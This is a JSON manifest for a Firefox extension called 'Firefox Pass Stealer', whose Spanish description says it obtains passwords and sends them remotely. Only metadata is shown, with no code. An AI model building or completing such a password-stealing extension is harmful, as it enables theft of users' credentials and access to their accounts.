{
    "name": "Firefox Pass Stealer", 
    "license": "GPL 3.0", 
    "author": "Matías Lang <sh4r3m4n>", 
    "version": "0.1", 
    "fullName": "firefox-pass-stealer", 
    "id": "firefox-pass-stealer", 
    "description": "Extensión para firefox que nos permite obtener contraseñas y enviarlas remotamente"
}
